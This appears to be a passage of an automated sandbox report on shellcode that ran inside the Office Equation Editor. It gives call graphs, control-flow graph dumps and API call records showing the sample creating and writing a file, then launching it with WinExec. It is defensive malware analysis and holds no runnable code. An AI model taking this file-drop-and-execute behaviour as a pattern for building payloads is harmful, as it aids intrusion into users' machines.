1910->1914 1911->1889 1911->1891 1911->1906 1912->1914 1915 352088a ExitProcess 1912->1915 1916 3520867 3 API calls 1913->1916 1914->1848 1917 352085f 1916->1917 1917->1914 1919 352069d 1918->1919 1920 35206c1 30 API calls 1919->1920 1921 35206a7 1920->1921 1922 35206d4 1921->1922 1923 3520739 1921->1923 1924 3520700 24 API calls 1922->1924 1942 3520743 1922->1942 1927 352075a 15 API calls 1923->1927 1923->1942 1926 35206ee 1924->1926 1925 3520776 12 API calls 1929 352076c 1925->1929 1930 352079a 1926->1930 1933 3520728 1926->1933 1928 352073f 1927->1928 1928->1929 1928->1930 1928->1942 1931 3520801 1929->1931 1932 3520771 1929->1932 1937 352080e 1929->1937 1939 35207f4 WriteFile 1929->1939 1935 35207b4 6 API calls 1930->1935 1934 3520815 3 API calls 1931->1934 1932->1850 1940 352075a 15 API calls 1933->1940 1936 3520809 1934->1936 1935->1929 1936->1937 1938 3520873 WinExec 1936->1938 1943 3520836 3 API calls 1937->1943 1941 3520887 ExitProcess 1938->1941 1939->1929 1940->1942 1945 352087b 1941->1945 1942->1925 1942->1929 1944 3520822 1943->1944 1946 3520834 1944->1946 1947 352089a 1944->1947 1945->1947 1948 352088a ExitProcess 1945->1948 1949 3520867 3 API calls 1946->1949 1947->1850 1950 352085f 1949->1950 1950->1947 1952 35206c4 1951->1952 2124 35206dd 1952->2124 1954 35206ca 1955 35206d4 1954->1955 1956 3520739 1954->1956 1957 3520700 24 API calls 1955->1957 1975 3520743 1955->1975 1960 352075a 15 API calls 1956->1960 1956->1975 1959 35206ee 1957->1959 1958 3520776 12 API calls 1962 352076c 1958->1962 1963 352079a 1959->1963 1966 3520728 1959->1966 1961 352073f 1960->1961 1961->1962 1961->1963 1961->1975 1964 3520801 1962->1964 1965 3520771 1962->1965 1970 352080e 1962->1970 1972 35207f4 WriteFile 1962->1972 1968 35207b4 6 API calls 1963->1968 1967 3520815 3 API calls 1964->1967 1965->1852 1973 352075a 15 API calls 1966->1973 1969 3520809 1967->1969 1968->1962 1969->1970 1971 3520873 WinExec 1969->1971 1976 3520836 3 API calls 1970->1976 1974 3520887 ExitProcess 1971->1974 1972->1962 1973->1975 1978 352087b 1974->1978 1975->1958 1975->1962 1977 3520822 1976->1977 1979 3520834 1977->1979 1980 352089a 1977->1980 1978->1980 1981 352088a ExitProcess 1978->1981 1982 3520867 3 API calls 1979->1982 1980->1852 1983 352085f 1982->1983 1983->1980 2151 352070d 1984->2151 1986 3520705 1987 352079a 1986->1987 1988 3520728 1986->1988 1989 35207b4 6 API calls 1987->1989 1990 352075a 15 API calls 1988->1990 1995 352076c 1989->1995 1991 3520743 1990->1991 1991->1995 1999 3520776 12 API calls 1991->1999 1992 3520836 3 API calls 1993 3520822 1992->1993 1994 352089a 1993->1994 1997 3520834 1993->1997 1994->1857 1996 3520801 1995->1996 2002 352080e 1995->2002 2005 3520771 1995->2005 2007 35207f4 WriteFile 1995->2007 1998 3520815 3 API calls 1996->1998 2003 3520867 3 API calls 1997->2003 2000 3520809 1998->2000 1999->1995 2001 3520873 WinExec 2000->2001 2000->2002 2004 3520887 ExitProcess 2001->2004 2002->1992 2006 352085f 2003->2006 2008 352087b 2004->2008 2005->1857 2006->1994 2007->1995 2008->1994 2009 352088a ExitProcess 2008->2009 2011 352075d 2010->2011 2012 3520776 12 API calls 2011->2012 2015 352076c 2012->2015 2013 3520771 2013->1859 2014 35207f4 WriteFile 2014->2015 2015->2013 2015->2014 2016 3520801 2015->2016 2017 3520815 3 API calls 2016->2017 2018 3520809 2017->2018 2019 3520873 WinExec 2018->2019 2020 352080e 2018->2020 2021 3520887 ExitProcess 2019->2021 2022 3520836 3 API calls 2020->2022 2024 352087b 2021->2024 2023 3520822 2022->2023 2025 3520834 2023->2025 2026 352089a 2023->2026 2024->2026 2027 352088a ExitProcess 2024->2027 2028 3520867 3 API calls 2025->2028 2026->1859 2029 352085f 2028->2029 2029->2026 2031 3520818 2030->2031 2032 3520836 3 API calls 2031->2032 2033 3520822 2032->2033 2034 352089a 2033->2034 2035 3520834 2033->2035 2034->1867 2036 3520867 3 API calls 2035->2036 2037 352085f 2036->2037 2037->2034 2039 352088a ExitProcess 2038->2039 2041 3520779 2040->2041 2200 352079a 2041->2200 2043 35207f4 WriteFile 2047 35207a4 2043->2047 2044 3520873 WinExec 2048 3520887 ExitProcess 2044->2048 2045 352080e 2050 3520836 3 API calls 2045->2050 2046 3520780 2046->2043 2046->2047 2051 35207b4 6 API calls 2046->2051 2056 3520805 2046->2056 2047->2043 2047->2045 2053 3520801 2047->2053 2049 352087b 2048->2049 2057 352088a ExitProcess 2049->2057 2058 352089a 2049->2058 2052 3520822 2050->2052 2051->2047 2055 3520834 2052->2055 2052->2058 2054 3520815 3 API calls 2053->2054 2054->2056 2059 3520867 3 API calls 2055->2059 2056->2044 2056->2045 2058->1860 2060 352085f 2059->2060 2060->2058 2067 35207b7 2061->2067 2062 3520801 2063 3520815 3 API calls 2062->2063 2064 3520809 2063->2064 2065 3520873 WinExec 2064->2065 2066 352080e 2064->2066 2068 3520887 ExitProcess 2065->2068 2070 3520836 3 API calls 2066->2070 2067->2062 2069 35207f4 WriteFile 2067->2069 2072 352087b 2068->2072 2069->2067 2071 3520822 2070->2071 2073 3520834 2071->2073 2074 352089a 2071->2074 2072->2074 2075 352088a ExitProcess 2072->2075 2076 3520867 3 API calls 2073->2076 2074->1860 2077 352085f 2076->2077 2077->2074 2079 3520839 2078->2079 2080 3520867 3 API calls 2079->2080 2081 352085f 2080->2081 2081->1875 2083 352086a WinExec 2082->2083 2085 3520887 ExitProcess 2083->2085 2086 352087b 2085->2086 2087 352085f 2086->2087 2088 352088a ExitProcess 2086->2088 2087->1878 2090 3520679 2089->2090 2091 352069a 33 API calls 2090->2091 2092 3520689 2091->2092 2093 35206c1 30 API calls 2092->2093 2094 35206a7 2093->2094 2095 35206d4 2094->2095 2097 3520739 2094->2097 2096 3520700 24 API calls 2095->2096 2106 3520743 2095->2106 2099 35206ee 2096->2099 2100 352075a 15 API calls 2097->2100 2097->2106 2098 3520776 12 API calls 2109 352076c 2098->2109 2102 352079a 2099->2102 2105 3520728 2099->2105 2101 352073f 2100->2101 2101->2102 2101->2106 2101->2109 2108 35207b4 6 API calls 2102->2108 2103 3520801 2107 3520815 3 API calls 2103->2107 2104 3520771 2104->1885 2114 352075a 15 API calls 2105->2114 2106->2098 2106->2109 2110 3520809 2107->2110 2108->2109 2109->2103 2109->2104 2111 352080e 2109->2111 2113 35207f4 WriteFile 2109->2113 2110->2111 2112 3520873 WinExec 2110->2112 2116 3520836 3 API calls 2111->2116 2115 3520887 ExitProcess 2112->2115 2113->2109 2114->2106 2118 352087b 2115->2118 2117 3520822 2116->2117 2119 3520834 2117->2119 2120 352089a 2117->2120 2118->2120 2121 352088a ExitProcess 2118->2121 2122 3520867 3 API calls 2119->2122 2120->1885 2123 352085f 2122->2123 2123->2120 2125 35206e0 2124->2125 2126 35206ee 2125->2126 2127 3520700 24 API calls 2125->2127 2128 352079a 2126->2128 2129 3520728 2126->2129 2127->2126 2130 35207b4 6 API calls 2128->2130 2131 352075a 15 API calls 2129->2131 2141 352076c 2130->2141 2135 3520743 2131->2135 2132 352080e 2133 3520836 3 API calls 2132->2133 2134 3520822 2133->2134 2137 3520834 2134->2137 2143 352089a 2134->2143 2139 3520776 12 API calls 2135->2139 2135->2141 2136 3520801 2138 3520815 3 API calls 2136->2138 2144 3520867 3 API calls 2137->2144 2140 3520809 2138->2140 2139->2141 2140->2132 2142 3520873 WinExec 2140->2142 2141->2132 2141->2136 2146 3520771 2141->2146 2148 35207f4 WriteFile 2141->2148 2145 3520887 ExitProcess 2142->2145 2143->1954 2147 352085f 2144->2147 2149 352087b 2145->2149 2146->1954 2147->2143 2148->2141 2149->2143 2150 352088a ExitProcess 2149->2150 2152 3520710 2151->2152 2178 3520729 2152->2178 2154 3520716 2155 352079a 2154->2155 2156 3520728 2154->2156 2157 35207b4 6 API calls 2155->2157 2158 352075a 15 API calls 2156->2158 2168 352076c 2157->2168 2160 3520743 2158->2160 2159 352080e 2161 3520836 3 API calls 2159->2161 2166 3520776 12 API calls 2160->2166 2160->2168 2162 3520822 2161->2162 2164 3520834 2162->2164 2170 352089a 2162->2170 2163 3520801 2165 3520815 3 API calls 2163->2165 2171 3520867 3 API calls 2164->2171 2167 3520809 2165->2167 2166->2168 2167->2159 2169 3520873 WinExec 2167->2169 2168->2159 2168->2163 2173 3520771 2168->2173 2175 35207f4 WriteFile 2168->2175 2172 3520887 ExitProcess 2169->2172 2170->1986 2174 352085f 2171->2174 2176 352087b 2172->2176 2173->1986 2174->2170 2175->2168 2176->2170 2177 352088a ExitProcess 2176->2177 2179 352072c 2178->2179 2180 352075a 15 API calls 2179->2180 2181 3520743 2180->2181 2184 3520776 12 API calls 2181->2184 2185 352076c 2181->2185 2182 3520801 2183 3520815 3 API calls 2182->2183 2186 3520809 2183->2186 2184->2185 2185->2182 2190 3520771 2185->2190 2191 35207f4 WriteFile 2185->2191 2187 3520873 WinExec 2186->2187 2188 352080e 2186->2188 2189 3520887 ExitProcess 2187->2189 2192 3520836 3 API calls 2188->2192 2194 352087b 2189->2194 2190->2154 2191->2185 2193 3520822 2192->2193 2195 3520834 2193->2195 2196 352089a 2193->2196 2194->2196 2197 352088a ExitProcess 2194->2197 2198 3520867 3 API calls 2195->2198 2196->2154 2199 352085f 2198->2199 2199->2196 2201 352079d 2200->2201 2202 35207b4 6 API calls 2201->2202 2206 35207a4 2202->2206 2203 352080e 2204 3520836 3 API calls 2203->2204 2205 3520822 2204->2205 2207 3520834 2205->2207 2210 352089a 2205->2210 2206->2203 2208 3520801 2206->2208 2216 35207f4 WriteFile 2206->2216 2213 3520867 3 API calls 2207->2213 2209 3520815 3 API calls 2208->2209 2211 3520809 2209->2211 2210->2046 2211->2203 2212 3520873 WinExec 2211->2212 2214 3520887 ExitProcess 2212->2214 2215 352085f 2213->2215 2217 352087b 2214->2217 2215->2210 2216->2206 2217->2210 2218 352088a ExitProcess 2217->2218 2219 352088e GetPEB 2220 352089c 2219->2220

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_03520617 1 Function_03520815 0->1 2 Function_0352075A 0->2 4 Function_0352069A 0->4 14 Function_03520700 0->14 15 Function_035206C1 0->15 17 Function_03520887 0->17 23 Function_03520776 0->23 24 Function_035208B6 0->24 25 Function_03520836 0->25 27 Function_035207B4 0->27 29 Function_03520661 0->29 30 Function_03520867 0->30 32 Function_0352062A 0->32 1->24 1->25 1->30 2->1 2->17 2->23 2->24 2->25 2->30 3 Function_0352079A 3->1 3->17 3->24 3->25 3->27 3->30 4->1 4->2 4->14 4->15 4->17 4->23 4->24 4->25 4->27 4->30 5 Function_0352059B 5->0 5->1 5->2 5->4 5->14 5->15 16 Function_03520907 5->16 5->17 5->23 5->24 5->25 26 Function_035205B7 5->26 5->27 5->29 5->30 5->32 6 Function_035204D8 7 Function_035205DE 7->0 7->1 7->2 7->4 7->14 7->15 7->17 7->23 7->24 7->25 7->27 7->29 7->30 7->32 8 Function_0352031E 9 Function_035206DD 9->1 9->2 9->14 9->17 9->23 9->24 9->25 9->27 9->30 10 Function_03520242 11 Function_03520582 11->0 11->1 11->2 11->4 11->5 11->14 11->15 11->17 11->23 11->24 11->25 11->27 11->29 11->30 11->32 12 Function_035204C3 13 Function_03520000 14->1 14->2 14->17 20 Function_0352070D 14->20 14->23 14->24 14->25 14->27 14->30 15->1 15->2 15->9 15->14 15->17 15->23 15->24 15->25 15->27 15->30 18 Function_03520108 19 Function_0352088E 19->24 20->1 20->2 20->17 20->23 20->24 20->25 20->27 20->30 34 Function_03520729 20->34 21 Function_035200B1 22 Function_03520676 22->1 22->2 22->4 22->14 22->15 22->17 22->23 22->24 22->25 22->27 22->30 23->1 23->3 23->17 23->24 23->25 23->27 23->30 25->24 25->30 26->0 26->1 26->2 26->4 26->7 26->14 26->15 26->16 26->17 26->23 26->24 26->25 26->27 26->29 26->30 26->32 27->1 27->17 27->24 27->25 27->30 28 Function_035203E3 29->1 29->2 29->4 29->14 29->15 29->17 29->22 29->23 29->24 29->25 29->27 29->30 30->17 31 Function_035204A4 32->1 32->2 32->4 32->14 32->15 32->17 32->23 32->24 32->25 32->27 32->29 32->30 33 Function_0352016A 34->1 34->2 34->17 34->23 34->24 34->25 34->30 35 Function_035201EC

                                                                      Executed Functions

                                                                      Function 035207B4 Relevance: 4.6, APIs: 3, Instructions: 83fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 35207b4-35207b7 2 35207b9-35207ca 0->2 6 3520801-352080c call 3520815 2->6 7 35207cc-35207d1 2->7 13 3520873-352087e WinExec call 3520887 6->13 14 352080e-352082d call 3520836 6->14 9 35207d3-35207d6 7->9 10 35207d8-35207ff WriteFile 7->10 9->10 10->2 24 35208d0 13->24 25 3520880 13->25 27 352089b-35208a3 14->27 28 352082f 14->28 31 35208d2-35208d6 24->31 32 35208d8-35208dc 24->32 29 3520882-352088c ExitProcess 25->29 30 35208f1-35208f3 25->30 38 35208a5-35208a7 27->38 39 35208c9-35208cd 27->39 34 3520831-3520832 28->34 35 352089a 28->35 37 3520903-3520904 30->37 31->32 33 35208e4-35208eb 31->33 32->30 36 35208de-35208e2 32->36 43 35208ef 33->43 44 35208ed 33->44 41 3520834-3520860 call 3520867 34->41 42 35208a8-35208ad 34->42 35->27 36->30 36->33 38->42 39->24 41->35 46 35208af-35208b4 42->46 47 352089c-35208ad call 35208b6 42->47 43->30 45 35208f5-35208fe 43->45 44->30 54 3520900 45->54 55 35208c7-35208ca 45->55 46->39 47->46 54->37 55->45 57 35208cc 55->57 57->24
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(035206EE,03520705,00000000,00000000,00000000,?,03520705,035206EE,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 035207FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
                                                                      • Instruction ID: c0342ab3e8512f3a85aa04771464e6a219a2701b9d9726d0ff6913b538de56c1
                                                                      • Opcode Fuzzy Hash: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
                                                                      • Instruction Fuzzy Hash: 9221C5714093156ADA10EA60AC81F7FBEB9FBC2B00F148A19F5915B0F1D6B0D50886E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 03520582 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 58 3520582-35205a9 ExitProcess call 352059b 61 35205fc-3520618 58->61 62 35205ac 58->62 66 3520619-352061f call 352062a 61->66 64 35205ae-35205b1 62->64 65 352061d-352061f 62->65 64->66 69 35205b4-35205ce 64->69 67 3520620-3520622 65->67 68 3520686 call 352069a 65->68 66->68 79 3520621-3520622 66->79 71 3520624-352063a 67->71 72 3520689-35206d2 call 35206c1 67->72 68->72 76 352063f-352064c CreateFileW call 3520661 69->76 82 35205d0-35205d6 69->82 71->76 90 35206d4-35206d6 72->90 91 3520739 72->91 84 3520651-352065f 76->84 79->71 79->72 88 352064a 82->88 89 35205d8-35205fb call 3520617 82->89 84->68 88->84 98 352064c call 3520661 88->98 89->61 93 35206d9 90->93 94 352074e-352074f 90->94 95 352073b-3520747 call 352075a 91->95 96 352075f-352076d call 3520776 91->96 100 3520750-3520752 93->100 101 35206dc-3520722 call 3520700 93->101 94->100 102 35207b6-35207b7 94->102 109 35207bd 95->109 124 3520749 95->124 120 35207d8-35207ff WriteFile 96->120 121 352076f 96->121 98->84 108 3520755-3520757 100->108 122 3520725 101->122 123 352079a 101->123 103 35207b9 102->103 103->109 110 3520759-352075d 108->110 111 35207be-35207ca 108->111 109->111 110->96 125 3520801-352080c call 3520815 111->125 126 35207cc-35207d1 111->126 120->103 127 3520771-352077a 121->127 128 35207d6 121->128 129 3520728-352074f call 352075a 122->129 130 352079c 122->130 132 352079d-35207b1 call 35207b4 123->132 131 352074b 124->131 124->132 143 3520873-352087e WinExec call 3520887 125->143 144 352080e-3520813 125->144 126->120 134 35207d3 126->134 128->120 129->102 152 3520751-3520752 129->152 130->132 131->94 141 35207b3 132->141 142 3520814 132->142 134->128 141->102 147 3520817-352082d call 3520836 142->147 155 35208d0 143->155 156 3520880 143->156 144->147 158 352089b-35208a3 147->158 159 352082f 147->159 152->108 162 35208d2-35208d6 155->162 163 35208d8-35208dc 155->163 160 3520882-352088c ExitProcess 156->160 161 35208f1-35208f3 156->161 169 35208a5-35208a7 158->169 170 35208c9-35208cd 158->170 165 3520831-3520832 159->165 166 352089a 159->166 168 3520903-3520904 161->168 162->163 164 35208e4-35208eb 162->164 163->161 167 35208de-35208e2 163->167 174 35208ef 164->174 175 35208ed 164->175 172 3520834-3520860 call 3520867 165->172 173 35208a8-35208ad 165->173 166->158 167->161 167->164 169->173 170->155 172->166 177 35208af-35208b4 173->177 178 352089c-35208ad call 35208b6 173->178 174->161 176 35208f5-35208fe 174->176 175->161 185 3520900 176->185 186 35208c7-35208ca 176->186 177->170 178->177 185->168 186->176 188 35208cc 186->188 188->155
                                                                      APIs
                                                                      • ExitProcess.KERNELBASE(03520570), ref: 03520582
                                                                        • Part of subcall function 0352059B: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03520647
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateExitFileProcess
                                                                      • String ID:
                                                                      • API String ID: 2838702978-0
                                                                      • Opcode ID: 680202d3448b635bfa15b890d00029387e6ae4dfaac09712cf61206fa0a5f26a
                                                                      • Instruction ID: 5530c0a422406befdd26f2c4d6cafa1cf0bbe0d3fcd06c03dbf6bf2ddbc7e4eb
                                                                      • Opcode Fuzzy Hash: 680202d3448b635bfa15b890d00029387e6ae4dfaac09712cf61206fa0a5f26a
                                                                      • Instruction Fuzzy Hash: 2121EF6580F7D45FE322D7202E5E794BF60BB93A00F1D49CA91C54F1F3D295A10A93D6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 03520867 Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 189 3520867-352087e WinExec call 3520887 195 35208d0 189->195 196 3520880 189->196 199 35208d2-35208d6 195->199 200 35208d8-35208dc 195->200 197 3520882-352088c ExitProcess 196->197 198 35208f1-35208f3 196->198 203 3520903-3520904 198->203 199->200 201 35208e4-35208eb 199->201 200->198 202 35208de-35208e2 200->202 205 35208ef 201->205 206 35208ed 201->206 202->198 202->201 205->198 207 35208f5-35208fe 205->207 206->198 210 3520900 207->210 211 35208c7-35208ca 207->211 210->203 211->207 212 35208cc 211->212 212->195
                                                                      APIs
                                                                      • WinExec.KERNEL32(?,00000001,?,0352085F,?,03520822,?,?,03520809,00000000,00000000,00000000,00000000,035206A7,00000050,00000000), ref: 03520874
                                                                        • Part of subcall function 03520887: ExitProcess.KERNELBASE(00000000,?,0352087B,?,0352085F,?,03520822,?,?,03520809,00000000,00000000,00000000,00000000,035206A7,00000050), ref: 0352088C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: ExecExitProcess
                                                                      • String ID:
                                                                      • API String ID: 4112423671-0
                                                                      • Opcode ID: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                                                                      • Instruction ID: 74f896aedd4e7668d09d838e54e4940179a0accaa0fe4bec4aa95cfe9982b4b2
                                                                      • Opcode Fuzzy Hash: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                                                                      • Instruction Fuzzy Hash: 10F0D19994637251CB34E238A8487FBAE61BB93310FCC8853EC82070F6916880C397D9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 03520617 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 213 3520617-352061f call 352062a 217 3520621-3520622 213->217 218 3520686 call 352069a 213->218 219 3520624-352065f CreateFileW call 3520661 217->219 220 3520689-35206d2 call 35206c1 217->220 218->220 219->218 229 35206d4-35206d6 220->229 230 3520739 220->230 232 35206d9 229->232 233 352074e-352074f 229->233 234 352073b-3520747 call 352075a 230->234 235 352075f-352076d call 3520776 230->235 237 3520750-3520752 232->237 238 35206dc-3520722 call 3520700 232->238 233->237 239 35207b6-35207b7 233->239 245 35207bd 234->245 259 3520749 234->259 255 35207d8-35207ff WriteFile 235->255 256 352076f 235->256 244 3520755-3520757 237->244 257 3520725 238->257 258 352079a 238->258 240 35207b9 239->240 240->245 246 3520759-352075d 244->246 247 35207be-35207ca 244->247 245->247 246->235 260 3520801-352080c call 3520815 247->260 261 35207cc-35207d1 247->261 255->240 262 3520771-352077a 256->262 263 35207d6 256->263 264 3520728-352074f call 352075a 257->264 265 352079c 257->265 267 352079d-35207b1 call 35207b4 258->267 266 352074b 259->266 259->267 278 3520873-352087e WinExec call 3520887 260->278 279 352080e-3520813 260->279 261->255 269 35207d3 261->269 263->255 264->239 287 3520751-3520752 264->287 265->267 266->233 276 35207b3 267->276 277 3520814 267->277 269->263 276->239 282 3520817-352082d call 3520836 277->282 290 35208d0 278->290 291 3520880 278->291 279->282 293 352089b-35208a3 282->293 294 352082f 282->294 287->244 297 35208d2-35208d6 290->297 298 35208d8-35208dc 290->298 295 3520882-352088c ExitProcess 291->295 296 35208f1-35208f3 291->296 304 35208a5-35208a7 293->304 305 35208c9-35208cd 293->305 300 3520831-3520832 294->300 301 352089a 294->301 303 3520903-3520904 296->303 297->298 299 35208e4-35208eb 297->299 298->296 302 35208de-35208e2 298->302 309 35208ef 299->309 310 35208ed 299->310 307 3520834-3520860 call 3520867 300->307 308 35208a8-35208ad 300->308 301->293 302->296 302->299 304->308 305->290 307->301 312 35208af-35208b4 308->312 313 352089c-35208ad call 35208b6 308->313 309->296 311 35208f5-35208fe 309->311 310->296 320 3520900 311->320 321 35208c7-35208ca 311->321 312->305 313->312 320->303 321->311 323 35208cc 321->323 323->290
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 416f93c117a728af7f2b2bdd79a199b96d3fb460dd29e5ce8bbb6cdc2b3b8add
                                                                      • Instruction ID: cf51d5bc93ed768e33fdb11e6ac7740426a0a6dc412aedc6c8d42d1faeeba253
                                                                      • Opcode Fuzzy Hash: 416f93c117a728af7f2b2bdd79a199b96d3fb460dd29e5ce8bbb6cdc2b3b8add
                                                                      • Instruction Fuzzy Hash: 4241DA2044E7E12ED722E7305D9AB59BF747F83A00F2985CEE1814F1F3E6A56209C756
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 035206C1 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 324 35206c1-35206d2 call 35206dd 328 35206d4-35206d6 324->328 329 3520739 324->329 330 35206d9 328->330 331 352074e-352074f 328->331 332 352073b-352073e call 352075a 329->332 333 352075f-352076d call 3520776 329->333 334 3520750-3520752 330->334 335 35206dc-3520722 call 3520700 330->335 331->334 336 35207b6-35207b7 331->336 350 352073f-3520747 332->350 352 35207d8-35207ff WriteFile 333->352 353 352076f 333->353 341 3520755-3520757 334->341 354 3520725 335->354 355 352079a 335->355 337 35207b9 336->337 342 35207bd 337->342 343 3520759-352075d 341->343 344 35207be-35207ca 341->344 342->344 343->333 357 3520801-352080c call 3520815 344->357 358 35207cc-35207d1 344->358 350->342 356 3520749 350->356 352->337 359 3520771-352077a 353->359 360 35207d6 353->360 361 3520728-3520738 354->361 362 352079c 354->362 364 352079d-35207b1 call 35207b4 355->364 363 352074b 356->363 356->364 375 3520873-352087e WinExec call 3520887 357->375 376 352080e-3520813 357->376 358->352 366 35207d3 358->366 360->352 372 352073e-352074f call 352075a 361->372 362->364 363->331 373 35207b3 364->373 374 3520814 364->374 366->360 372->336 384 3520751-3520752 372->384 373->336 379 3520817-352082d call 3520836 374->379 387 35208d0 375->387 388 3520880 375->388 376->379 390 352089b-35208a3 379->390 391 352082f 379->391 384->341 394 35208d2-35208d6 387->394 395 35208d8-35208dc 387->395 392 3520882-352088c ExitProcess 388->392 393 35208f1-35208f3 388->393 401 35208a5-35208a7 390->401 402 35208c9-35208cd 390->402 397 3520831-3520832 391->397 398 352089a 391->398 400 3520903-3520904 393->400 394->395 396 35208e4-35208eb 394->396 395->393 399 35208de-35208e2 395->399 406 35208ef 396->406 407 35208ed 396->407 404 3520834-3520860 call 3520867 397->404 405 35208a8-35208ad 397->405 398->390 399->393 399->396 401->405 402->387 404->398 409 35208af-35208b4 405->409 410 352089c-35208ad call 35208b6 405->410 406->393 408 35208f5-35208fe 406->408 407->393 417 3520900 408->417 418 35208c7-35208ca 408->418 409->402 410->409 417->400 418->408 420 35208cc 418->420 420->387
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.457970308.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66b12095d77fd94ea65a69a68c420aa6cec82a98ef1edfc52787f6ea6af5b01e
                                                                      • Instruction ID: 1a064e8ac65e73a53707d39e66f7965cad1eb20bc9b719bef2b08c3af14a8674
                                                                      • Opcode Fuzzy Hash: 66b12095d77fd94ea65a69a68c420aa6cec82a98ef1edfc52787f6ea6af5b01e
                                                                      • Instruction Fuzzy Hash: 7131D63040E7D26FC711EB609D41B6ABF79BFC3640F1C898DF1814B0F2E66596098B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 03520661 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 421 3520661-3520672 LoadLibraryW call 3520676 424 3520674-35206d2 call 352069a call 35206c1 421->424 425 35206d9 421->425 461 35206d4-35206d6 424->461 462 3520739 424->462 427 3520750-3520752 425->427 428 35206dc-3520722 call 3520700 425->428 431 3520755-3520757 427->431 440 3520725 428->440 441 352079a 428->441 432 3520759-352075d 431->432 433 35207be-35207ca 431->433 436 352075f-352076d call 3520776 432->436 444 3520801-352080c call 3520815 433->444 445 35207cc-35207d1 433->445 452 35207d8-35207ff WriteFile 436->452 465 352076f 436->465 446 3520728-3520738 440->446 447 352079c 440->447 453 352079d-35207b1 call 35207b4 441->453 463 3520873-352087e WinExec call 3520887 444->463 464 352080e-3520813 444->464 451 35207d3 445->451 445->452 458 352073e-352074f call 352075a 446->458 447->453 457 35207d6 451->457 482 35207b9 452->482 468 35207b3 453->468 469 3520814 453->469 457->452 477 35207b6-35207b7 458->477 481 3520751-3520752 458->481 461->425 471 352074e-352074f 461->471 462->436 472 352073b-352073e call 352075a 462->472 488 35208d0 463->488 489 3520880 463->489 470 3520817-352082d call 3520836 464->470 465->457 474 3520771-352077a 465->474 468->477 469->470 491 352089b-35208a3 470->491 492 352082f 470->492 471->427 471->477 493 352073f-3520747 472->493 477->482 481->431 486 35207bd 482->486 486->433 496 35208d2-35208d6 488->496 497 35208d8-35208dc 488->497 494 3520882-352088c ExitProcess 489->494 495 35208f1-35208f3 489->495 503 35208a5-35208a7 491->503 504 35208c9-35208cd 491->504 499 3520831-3520832 492->499 500 352089a 492->500 493->486 505 3520749 493->505 502 3520903-3520904 495->502 496->497 498 35208e4-35208eb 496->498 497->495 501 35208de-35208e2 497->501 509 35208ef 498->509 510 35208ed 498->510 507 3520834-3520860 call 3520867 499->507 508 35208a8-35208ad 499->508 500->491 501->495 501->498 503->508 504->488 505->453 511 352074b 505->511 507->500 513 35208af-35208b4 508->513 514 352089c-35208ad call 35208b6 508->514 509->495 512 35208f5-35208fe 509->512 510->495 511->471 521 3520900 512->521 522 